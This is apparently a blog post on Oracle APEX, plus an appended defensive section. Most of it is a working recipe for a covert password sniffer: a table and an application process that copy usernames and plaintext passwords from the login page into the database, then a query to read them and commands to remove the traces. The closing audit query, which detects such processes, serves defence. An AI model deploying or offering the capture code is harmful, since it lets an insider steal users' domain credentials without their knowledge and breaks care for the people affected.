APEX password sniffer

You can easily capture user passwords when they login to your application.

So if your company uses LDAP or any other kind of verification where the user fills in a form with a password on an APEX page, you can capture it. Whenever they log in you will have their login name and domain password.

I don't need to tell you that you should not do that, but you should be aware of this issue and you should avoid weak verifications if possible. The best way to avoid this issue is to use SSO.

Steps required

  • Create table for captured passwords:
    CREATE TABLE passwords (
        user_name       VARCHAR2(255)  NOT NULL,
        password        VARCHAR2(255),
        created_at      DATE,
        --
        CONSTRAINT pk_passwords PRIMARY KEY (user_name)
    );
    
  • In your APEX application go to Shared Components, Application Processes and click Create.
  • Select Point On Submit: After Page Submission - After Computations and Validations. Enter PL/SQL code below:
    MERGE INTO passwords t
    USING (
        SELECT
            APEX_UTIL.GET_SESSION_STATE('P9999_USERNAME')   AS user_name,
            APEX_UTIL.GET_SESSION_STATE('P9999_PASSWORD')   AS password,
            SYSDATE                                         AS created_at
        FROM DUAL
        WHERE APEX_UTIL.GET_SESSION_STATE('P9999_USERNAME') IS NOT NULL
    ) s
        ON (s.user_name = t.user_name)
    WHEN MATCHED THEN
        UPDATE SET
            t.password      = s.password,
            t.created_at    = s.created_at
    WHEN NOT MATCHED THEN
        INSERT (t.user_name, t.password, t.created_at)
        VALUES (s.user_name, s.password, s.created_at);
    
  • Set Condition Type to PL/SQL Expression and Expression to:
    APEX_APPLICATION.G_FLOW_STEP_ID = 9999
  • You may need to adjust this if your login page has a different number.
  • Check results and cleanup:
    -- mischief managed
    SELECT p.*
    FROM passwords p
    ORDER BY p.created_at DESC;
    
    -- drop table and remove process from APEX
    DROP TABLE passwords PURGE;
    

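The same mechanism can be audited from the other side. The query below is an added example (not part of the original post) that scans the APEX dictionary views for application-level and page-level processes whose source references a password item, which is exactly what the process above does. It assumes the views APEX_APPLICATION_PROCESSES, APEX_APPLICATION_PAGE_PROC and APEX_APPLICATION_PAGE_ITEMS with the column names used below (PROCESS_SOURCE, DISPLAY_AS, ITEM_NAME); check them against the APEX version you run, as column names differ between releases.

```sql
-- Added audit query, not from the original post.
-- Assumed view/column names: verify against your APEX release.
WITH password_items AS (
    -- every page item rendered as a password field, in every application of the workspace
    SELECT i.application_id,
           i.page_id,
           i.item_name
    FROM   apex_application_page_items i
    WHERE  UPPER(i.display_as) LIKE '%PASSWORD%'
),
all_processes AS (
    -- application-level processes (Shared Components > Application Processes)
    SELECT p.application_id,
           p.application_name,
           NULL            AS page_id,
           p.process_name,
           p.process_point,
           p.process_source
    FROM   apex_application_processes p
    UNION ALL
    -- page-level processes
    SELECT pp.application_id,
           pp.application_name,
           pp.page_id,
           pp.process_name,
           pp.process_point,
           pp.process_source
    FROM   apex_application_page_proc pp
)
SELECT ap.application_id,
       ap.application_name,
       ap.page_id,
       ap.process_name,
       ap.process_point,
       pi.item_name        AS referenced_password_item
FROM   all_processes ap
JOIN   password_items pi
       ON  pi.application_id = ap.application_id
       -- INSTR works on CLOB sources as well as VARCHAR2
       AND INSTR(UPPER(ap.process_source), UPPER(pi.item_name)) > 0
ORDER  BY ap.application_id, ap.page_id NULLS FIRST, ap.process_name;
```

Run it as a workspace user (or against the APEX_* views as an administrator) and review every row: a legitimate authentication process that reads the password item should live in the authentication scheme, not in an application process fired after page submission. A process that reads the password item and writes to a table other than the authentication target is the pattern described in this post.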